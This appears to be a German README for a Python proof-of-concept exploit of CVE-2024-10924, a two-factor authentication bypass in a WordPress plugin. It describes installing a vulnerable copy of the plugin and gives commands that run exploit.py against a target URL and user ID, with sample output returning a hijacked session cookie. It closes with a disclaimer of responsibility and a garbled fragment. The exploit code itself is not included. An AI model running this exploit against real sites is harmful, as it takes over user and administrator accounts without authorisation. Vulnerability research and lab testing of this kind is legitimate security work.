
In Python geschriebener POC für CVE-2024-10924
Ein Fehler in der Fehlerbehandlung der REST-API des Really Simple Plugins WordPress-Plugins (Versionen zwischen 9.0.0 und 9.1.1.1 inklusive) ermöglicht einem Angreifer, wenn die Zwei-Faktor-Authentifizierung aktiviert ist, die Authentifizierung zu umgehen und die Kontrolle über ein bestehendes Benutzer- oder Administratorkonto zu übernehmen.
Da ich ein netter Kerl bin, findest du hier auch Version 9.1.1.1 des Plugins. Entpacke es einfach und lade es in den Ordner wp-content/plugins hoch. Vergiss nicht, das Plugin zu aktivieren und 2FA zu aktivieren.
Installiere die erforderlichen Abhängigkeiten mit pip:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
Mit einer bestimmten Benutzer-ID:
python exploit.py -id 10 http://localhost:8886/
Dies sendet die Exploit-Payload mit einer Benutzer-ID von 10.
Ohne Angabe einer Benutzer-ID:
python exploit.py http://localhost
Standardmäßig wird die Benutzer-ID auf 1 gesetzt.
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False) nur, wenn es für Tests erforderlich ist.IDK, aber ich übernehme keine Verantwortung für irgendetwas.